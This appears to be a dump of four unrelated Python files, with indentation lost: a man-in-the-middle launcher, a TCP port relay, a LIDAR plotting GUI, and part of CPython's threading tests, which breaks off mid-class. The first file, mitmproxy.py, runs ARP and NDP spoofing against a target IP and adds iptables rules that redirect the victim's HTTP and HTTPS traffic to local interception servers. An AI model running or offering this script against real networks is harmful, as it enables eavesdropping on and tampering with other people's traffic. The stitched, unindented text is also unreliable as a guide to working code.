mitmproxy.py
|
import arpspoof as spoof
import ndpspoof
import ssl_server
import http_server
import netifaces as ni
import time
import argparse
import subprocess
from multiprocessing import Process
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("interface", type=str,
help="network interface")
parser.add_argument("-t", type=str,
help="target ip", nargs='?', default=None)
parser.add_argument("-t6", type=str,
help="target ipv6", nargs='?', default=None)
args = parser.parse_args()
if args.t is None and args.t6 is None:
print("you have to specify at least a target ipv4 or ipv6 (-t or -t6)")
exit(-1)
try:
if args.t is not None:
subprocess.run('echo "1" > /proc/sys/net/ipv4/ip_forward', shell=True)
subprocess.run('iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 4433', shell=True)
subprocess.run('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080',
shell=True)
spoof.arpspoof(args.t, args.interface)
if args.t6 is not None:
subprocess.run('sysctl -w net.ipv6.conf.all.forwarding=1', shell=True)
subprocess.run('ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4433',
shell=True)
subprocess.run('ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080',
shell=True)
ndpspoof.ndpspoof(args.t6, args.interface)
host_ip = ni.ifaddresses(args.interface)[2][0]['addr']
Process(target=http_server.start_server, args=(host_ip,)).start()
Process(target=ssl_server.start_server, args=(host_ip,)).start()
while 1:
time.sleep(1)
except KeyboardInterrupt:
print("[*] User interrupt")
spoof.stop = 0
ndpspoof.stop = 0
ssl_server.stop = 0
http_server.stop = 0
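# A minimal run sketch (hypothetical interface and target addresses; needs root
# because the script toggles ip_forward/forwarding and adds iptables rules):
#   sudo python3 mitmproxy.py eth0 -t 192.168.1.10
#   sudo python3 mitmproxy.py eth0 -t6 fe80::1234
# The REDIRECT rules above divert intercepted traffic on ports 443/80 to the
# local ssl_server (4433) and http_server (8080) started in the two Processes.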
|
tcp.py
|
import sys
import socket
import threading
from relay import status
_kill = False
_relay_port = 0
_remote_address = ''
_remote_port = 0
_clients = 0
_servers = 0
_socks = []
def accept_clients():
global _socks
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind(('0.0.0.0', _relay_port))
client_sock.listen(10)
while True:
client_conn, addr = client_sock.accept()
if _kill:
client_sock.close()
for sock in _socks:
sock.close()
return
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect((_remote_address, _remote_port))
_socks.append(client_conn)
_socks.append(server_sock)
client_thread = threading.Thread(target=client_worker, kwargs={'client': client_conn, 'server': server_sock})
client_thread.start()
server_thread = threading.Thread(target=server_worker, kwargs={'client': client_conn, 'server': server_sock})
server_thread.start()
def close(client, server):
try:
client.close()
except socket.error:
pass
try:
server.close()
except socket.error:
pass
def client_worker(client, server):
global _clients
_clients += 1
while True:
try:
data = client.recv(1)
if data == b'':
close(client, server)
break
server.sendall(data)
status.bytes_to_remote += len(data)
except socket.error:
close(client, server)
break
_clients -= 1
def server_worker(client, server):
global _servers
_servers += 1
while True:
try:
data = server.recv(1)
if data == b'':
close(client, server)
break
client.sendall(data)
status.bytes_from_remote += len(data)
except socket.error:
close(client, server)
break
_servers -= 1
def start(relay_port, remote_address, remote_port):
global _relay_port
global _remote_address
global _remote_port
_relay_port = relay_port
_remote_address = remote_address
_remote_port = remote_port
accept_thread = threading.Thread(target=accept_clients)
accept_thread.start()
def stop():
global _kill
_kill = True
# connect to the listening port once so accept() returns and the thread can close
quit_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
quit_sock.connect(('127.0.0.1', _relay_port))
quit_sock.close()
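# A minimal usage sketch (hypothetical host and ports; assumes the surrounding
# relay package provides the imported status counters): forward local port 8080
# to example.org:80, then shut the relay down.
#   import tcp, time
#   tcp.start(8080, 'example.org', 80)
#   time.sleep(60)
#   tcp.stop()  # makes one local connection so accept() returns, letting the
#               # accept_clients thread see _kill and close its sockets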
|
main.py
|
# RPLIDAR Script
from adafruit_rplidar import RPLidar
from math import pi, floor
import datetime
from queue import Queue
from tkinter import messagebox
import time
from tkinter import *
from tkinter import font as tkFont
import threading
import subprocess
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
# Implement the default Matplotlib key bindings.
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
import os
"""Global Variables"""
# Default port for USB devices
PORT_NAME = '/dev/ttyUSB0'
# Global variable for LIDAR sensor
lidar = RPLidar(None, PORT_NAME)
# Data queue used for passing data from the scan thread to the GUI thread
data_queue = Queue(maxsize=10)
# GUI Global variables
lidar_program_running = True
window = Tk()
figure = plt.Figure(figsize=(30, 30), dpi=100)
ax = figure.add_subplot(111, projection='polar')
export = False
save_menu = ""
def scan():
# Function for generating lidar scan data
global lidar_program_running
# Create array of scan data
scan_data = [0]*360
try:
# Iterate through the scans produced by the LIDAR
for single_scan in lidar.iter_scans():
for (_, angle, distance) in single_scan:
scan_data[min([359, floor(angle)])] = distance
if not data_queue.full():
data_queue.put(scan_data)
except Exception as e:
print("scan error: ", e)
finally:
lidar_program_running = False
"""
Stops the lidar sensor
"""
def stop_sensor():
# Function for stopping the LIDAR scanner gracefully
try:
print("Stopping LIDAR")
lidar.stop()
time.sleep(2)
print("Disconnecting LIDAR")
lidar.disconnect()
except Exception as e:
print("stop_sensor error: ", e)
return
def draw_points():
# Function for updating the GUI canvas
global export
data_export = []
try:
# Grab the first data point in the queue
scan_points = data_queue.get()
if scan_points:
# Clear the polar plot
ax.clear()
# Loop through the list of data points
for angle in range(360):
# Assign a distance for each angle
distance = scan_points[angle]
# Convert angle from degrees to radians
radians = angle * pi / 180.0
if export:
data_export.append([angle, distance])
# Plot the data points on the polar graph
ax.plot(radians, distance, "ro", alpha=1)
if export:
export = False
show_save_menu(data_export)
# Draw the figure
ax.figure.canvas.draw()
except Exception as e:
# FOR DEBUG ---
# if export:
# export = False
# for i in range(0,20):
# data_export.append([i, "test"])
# show_save_menu(data_export)
print("draw_points error: ", e)
finally:
if lidar_program_running:
window.after(100, draw_points)
def exit():
try:
stop_sensor()
except Exception as e:
print("exit error: ", e)
finally:
time.sleep(1)
window.quit()
def save_data(val: list, loc: str):
global save_menu
filename = f'/home/pi/{loc}/export_{datetime.datetime.now().strftime("%d-%m-%Y_%I:%M_%s")}.csv'
export_file = open(filename, "w")
export_file.write(f'Angle,Distance \n')
# Loop through the list of data points
for elem in val:
export_file.write(f'{elem[0]}, {elem[1]} \n')
export_file.close()
messagebox.showinfo("Success", "Data exported to " + filename, parent=save_menu)
save_menu.destroy()
return
def show_save_menu(val):
global save_menu
print("exporting")
helv36 = tkFont.Font(family='Helvetica', size=40, weight=tkFont.BOLD) # configures the font for the widgets
disks = subprocess.check_output("cd ~ && ls -d */", shell=True).decode("utf8").replace("/","").split("\n")[0:-1] # uses this command to get the disk names and stores them in a list
save_menu = Toplevel(window)
popup = Frame(save_menu)
popup.place(relx = 0.5,
rely = 0.5,
anchor = 'center')
save_menu.geometry(f'{window.winfo_screenwidth()}x{window.winfo_screenheight()}') # Size of the window
save_menu.title("Export to:")
my_str1 = StringVar()
l1 = Label(popup, textvariable=my_str1, width=20, font=tkFont.Font(family='Helvetica', size=30, weight=tkFont.BOLD) )
l1.grid(row=1, column=1)
my_str1.set("Save to:")
# listbox with disk names
items = Listbox(popup, width=30, height=15, font=tkFont.Font(family='Helvetica', size=30, weight=tkFont.BOLD))
ct = 0
for disk in disks:
items.insert(ct, disk)
ct+=1
items.grid(row=2, column=1)
save_button = Button(popup, width=20, height=3, text="Save", command=lambda: save_data(val=val, loc=disks[items.curselection()[0]]), bg="red", fg="white",
font=helv36)
save_button.grid(row=3, column=1)
def start_export():
global export
export = True
def setup_gui():
# This function sets up the GUI
# Set window title
window.title("Lidar Application")
# Set window to fill entire screen
window.geometry(f'{window.winfo_screenwidth()}x{window.winfo_screenheight()}')
helv36 = tkFont.Font(family='Helvetica', size=40, weight=tkFont.BOLD) # configures the font for the widgets
window.rowconfigure(0, minsize=100, weight=1)
window.columnconfigure(1, minsize=100, weight=1) # The main window for the application
buttons = Frame(window)
buttons.grid(row=0, column=0)
start = Button(buttons, width=20, height=3, text="Start", command=draw_points, bg="green", fg="white",
font=helv36) # start scan button (TO-DO)
start.pack()
stop = Button(buttons, width=20, height=3, command=stop_sensor, text="Stop", fg="white", bg="black",
font=helv36) # stop scan button (TO-DO)
stop.pack()
save = Button(buttons, width=20, height=3, command=start_export, text="Save", bg="blue", fg="white", font=helv36) # save button (TO-DO)
save.pack()
close = Button(buttons, width=20, height=3, text="Exit", command=exit, bg="red", fg="white",
font=helv36) # close button
close.pack()
# frame for plot
plot = Frame(master=window)
plot.grid(row=0, column=1)
ax.set_rlabel_position(-22.5) # Move radial labels away from plotted line
ax.grid(True)
canvas = FigureCanvasTkAgg(figure, plot) # adds the plot to the GUI
canvas.get_tk_widget().pack()
return
if __name__ == "__main__":
# Program entry point
# Print Lidar Information
print(lidar.info)
# Call setup code for GUI
setup_gui()
# Create thread for running scanner
scan_thread = threading.Thread(target=scan)
# Mark the scan thread as a daemon so it exits with the main program
scan_thread.daemon = True
# Start the scanning thread
scan_thread.start()
# Call the GUI loop
window.mainloop()
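# A minimal sketch of the hand-off used above (hypothetical data, no LIDAR
# attached): the scan thread puts 360-entry distance lists on data_queue, and
# draw_points drains them on the Tk main loop.
#   fake_scan = [100] * 360            # 100 mm in every direction
#   if not data_queue.full():
#       data_queue.put(fake_scan)
#   window.after(100, draw_points)     # schedule the consumer (the Start
#                                      # button simply calls draw_points)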
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
